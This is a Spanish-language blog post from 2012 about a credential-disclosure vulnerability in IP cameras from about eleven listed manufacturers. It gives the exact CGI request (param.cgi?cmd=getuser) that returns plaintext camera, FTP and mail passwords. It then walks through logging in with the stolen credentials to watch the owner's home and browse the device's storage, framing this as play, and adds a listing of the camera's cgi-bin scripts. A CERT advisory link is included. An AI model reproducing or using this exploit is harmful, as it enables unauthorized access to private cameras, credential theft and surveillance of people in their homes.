miércoles, octubre 17, 2012

Bug en Camaras IP

¡¡¡¡¡Hola a todos, buenos días!!!!!  Después de unos días un tanto aburridos leyendo por la red las noticias me encontré con una nueva vulnerabilidad en las cámaras IP y me vino a la mente el tema   Hack Streaming Servers de UN TAL 4N0NYM0US EN EL PC. Automáticamente pensé, vamos a jugar nosotros también, si el puede quitar cámaras de vigilancia porque yo no. (:P)

La vulnerabilidad en si se considera como grabe y afecta a una gran variedad de los modelos de cámaras convencionales y nos permite con una simple dirección de navegación acceder a las contraseñas de usuarios tanto de las asociadas al servicio, como FTP o mail en texto plano.

Por ahora se conocen 11 fabricantes afectados pero no se descarta que ese numero aumente.
Esta es la lista de afectados hasta ahora:

  • FOSCAM - FI9820W, FI9802W, FI8608W, FI8601W FI8602W, FI8620, FI8609W, FI8919WZ
  • WANSVIEW - NCH-536MW, NCH536MW, NCH-532MW, NCH532MW, NCH-531MW, NCH531MW
  • Suneyes - SP-HS05W, SP-HS02W
  • DBPOWER - H.264 HD MEGAPIXEL IPCAM
  • AGASIO - A522W, A622W
  • DERICAM - H501W
  • DSN-Q10
  • NVH-589MW
  • ASTAK MOLE
  • EasyN - HS-691
  • EasySE - H2




Explotarlo es bastante sencillo, solo necesitamos la direccion y el puerto de la camara y listo.
http://host:port/web/cgi-bin/hi3510/param.cgi?cmd=getuser

Aquí un ejemplo generalizando de ataque a la cámara 1.1.1.1 en el puerto 2
1.1.1.1:2/web/cgi-bin/hi3510/param.cgi?cmd=getuser
 Un ejemplo real:


Bien pues ya tenemos las credenciales, ahora vamos a ver si funcionan con los datos que obtuvimos de la dirección anterior



y como vemos entro perfectamente por lo que ya podemos comenzar a trastear a ver que logramos sacar



también podremos ver la casa de nuestro invitado un rato si tenemos los plugins adecuados

Incluso podemos ver que tiene alojado en la memoria, eso ya es cosa de cada uno.

Esta es la forma rapida de ataque pero hay muchos masparametos posibles que explica el manual oficial CGI User Manual.
Bueno si alguno quiere indagar un poco mas este es el contenido de /cgi-bin/:
0KB      2011-10-18 06:01:47  adsl_init.cgi
0KB      2011-09-01 11:56:40  chkwifi.cgi
0KB      2011-10-18 06:01:47  ddns_start.cgi
1KB      2011-10-18 06:01:47  getadslattr.cgi
0KB      2011-10-18 06:01:47  getddnsattr.cgi
1KB      2011-10-18 06:01:47  getinetattr.cgi
0KB      2011-09-01 11:56:40  getinterip.cgi
0KB      2011-09-01 11:56:40  getnettype.cgi
145KB   2011-10-18 06:01:47  getupnp.cgi
145KB   2011-09-01 11:56:40  getwifi.cgi
1KB      2011-10-18 06:01:47  getwifiattr.cgi
0KB      2011-09-01 11:56:40  ptzctrldown.cgi
0KB      2011-09-01 11:56:41  ptzctrlleft.cgi
0KB      2011-09-01 11:56:40  ptzctrlright.cgi
0KB      2011-09-01 11:56:40  ptzctrlup.cgi
0KB      2011-09-01 11:56:41  ptzctrlzoomin.cgi
0KB      2011-09-01 11:56:40  ptzctrlzoomout.cgi
2KB      2011-09-01 11:56:40  ser.cgi
4KB      2011-10-18 06:01:47  setadslattr.cgi
2KB      2011-10-18 06:01:47  setddnsattr.cgi
3KB      2011-10-18 06:01:47  setinetattr.cgi
2KB      2011-10-18 06:01:47  setwifiattr.cgi
2KB      2011-09-01 11:56:41  testwifi.cgi
145KB   2011-10-18 06:01:46  upnp_start.cgi
145KB   2011-10-18 06:01:46  upnp_stop.cgi
145KB   2011-10-18 06:01:47  wifi_start.cgi
145KB   2011-10-18 06:01:47  wifi_stop.cgi

http://www.kb.cert.org/vuls/id/265532

Espero les gustara y se diviertan tanto como yo.
Salu2

2 comentarios:

  1. Esto si que es un gran hermano en toda regla! jejej

    Gracias por traer la noticia y explotación! ;)

    ResponderEliminar
  2. Gracias Germán no esperaba verte por aquí, y menos tan pronto ^^

    ResponderEliminar